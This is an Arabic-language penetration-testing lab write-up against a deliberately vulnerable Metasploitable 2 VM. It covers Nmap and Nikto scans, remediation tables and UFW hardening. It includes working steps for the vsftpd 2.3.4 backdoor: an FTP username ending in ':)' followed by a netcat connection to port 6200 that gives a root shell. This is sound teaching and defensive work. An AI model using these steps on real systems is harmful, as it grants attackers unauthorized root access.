
مختبر هجوم ودفاع افتراضي مُتحكم فيه — استغلال CVE-2011-2523، استكشاف Nmap، فحص Nikto، تقوية UFW على Metasploitable 2
يحاكي هذا المختبر اختبار اختراق وتمارين تحصين دفاعية في بيئة افتراضية معزولة تمامًا. يوضح دورة حياة أمن الهجوم الكاملة — من الاستطلاع إلى الاستغلال — والضوابط الدفاعية التي من شأنها تخفيف كل خطر.
النتيجة الرئيسية: تم تحقيق وصول كامل كجذر (root) على الجهاز المستهدف في أقل من 60 ثانية عن طريق استغلال باب خلفي معروف، دون الحاجة إلى بيانات اعتماد أو أدوات خاصة.
| المكوّن | التفاصيل |
|---|---|
| Hypervisor (برنامج التشغيل الافتراضي) | VMware Workstation |
| الشبكة | Host-Only / NAT (معزولة تمامًا) |
| نظام تشغيل المهاجم | Ubuntu 24 LTS |
| نظام تشغيل الهدف | Metasploitable 2 (Linux 2.6.x) |
| عنوان IP المهاجم | 192.168.148.255 |
| عنوان IP الهدف | 192.168.148.130 |
Reconnaissance → Scanning → Exploitation → Defense & Hardening
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
النتائج الرئيسية — 23 منفذًا مفتوحًا إجمالاً:
nikto -h http://192.168.148.130 -o nikto_before.txt
تم العثور على 18 ثغرة، منها:
phpinfo.php يسرب كامل إعدادات الخادم/doc/ و /test/يحتوي vsftpd 2.3.4 على باب خلفي تم إدراجه من خلال اختراق سلسلة التوريد. إرسال اسم مستخدم ينتهي بـ :) يتسبب في فتح شل جذر على المنفذ 6200.
# الخطوة 1 — تشغيل الباب الخلفي عبر FTP
ftp 192.168.148.130
# اسم المستخدم: backdoor:) كلمة المرور: أي شيء
# الخطوة 2 — الاتصال بالشل المستغَل
nc 192.168.148.130 6200
# الخطوة 3 — التحقق من الوصول
whoami
# → root
النتيجة: تم تحقيق وصول كامل على مستوى الجذر (root) في أقل من 60 ثانية — بدون بيانات اعتماد، وبدون إطار عمل استغلال.
الأثر: يمكن للمهاجم صاحب صلاحية الجذر قراءة/تعديل/حذف أي ملف، تثبيت برمجيات خبيثة، تسريب بيانات، أو الانتقال إلى أجهزة أخرى على الشبكة.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH فقط
sudo ufw status verbose
انظر report.md للحصول على التقييم الكامل — المنهجية الكاملة، مخرجات الأوامر، جدول النتائج، خطوات الاستغلال، وجميع توصيات الإصلاح.
تم إجراء هذا المختبر في بيئة افتراضية معزولة تمامًا باستخدام برنامج ضعيف عمدًا (Metasploitable 2). جميع التقنيات لأغراض تعليمية وعرض أعمال فقط. لا تقم بتكرار ذلك على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
المؤلف: Amir Mohammad Marwi
| المنفذ | الخدمة | الإصدار | المخاطرة |
|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 حرج — باب خلفي معروف (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 متوسط — قديم |
| 23 | Telnet | Linux telnetd | 🟠 عالي — بروتوكول نص عادي |
| 80 | HTTP | Apache 2.2.8 | 🟠 عالي — ثغرات متعددة (CVEs) |
| 1524 | Bindshell | Root shell | 🔴 حرج — شل جذر مفتوحة |
| 3306 | MySQL | 5.0.51a | 🟠 عالي — قاعدة بيانات مكشوفة |
| 5900 | VNC | Protocol 3.3 | 🟠 عالي — مصادقة ضعيفة |
| 6667 | IRC | UnrealIRCd | 🔴 حرج — باب خلفي معروف |
| الثغرة | الإصلاح |
|---|
| الباب الخلفي لـ vsftpd 2.3.4 | الترقية إلى vsftpd 3.x أو الانتقال إلى SFTP |
| شل الجذر المفتوح (المنفذ 1524) | تعطيل فورًا، ومراجعة التثبيت |
| Telnet (المنفذ 23) | التعطيل — فرض SSH فقط |
| phpMyAdmin مكشوفة | تقييد الوصول حسب IP، وفرض مصادقة قوية |
| MySQL مكشوف (المنفذ 3306) | ربطه بـ localhost ومنع الوصول الخارجي |
| VNC مكشوف (المنفذ 5900) | تقييد الوصول حسب IP أو تعطيله |
| فهرسة الدليل | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| Apache و PHP قديمان | الترقية إلى إصدارات LTS مدعومة |
| الأداة | الغرض |
|---|
| Nmap | مسح المنافذ واكتشاف الخدمات |
| Nikto | فحص الثغرات على الويب |
| Netcat | الاتصال بشل الباب الخلفي |
| UFW | إعداد جدار الحماية على مستوى المضيف |
| عميل FTP | تشغيل الباب الخلفي لـ vsftpd |
| VMware Workstation | افتراضية المختبر |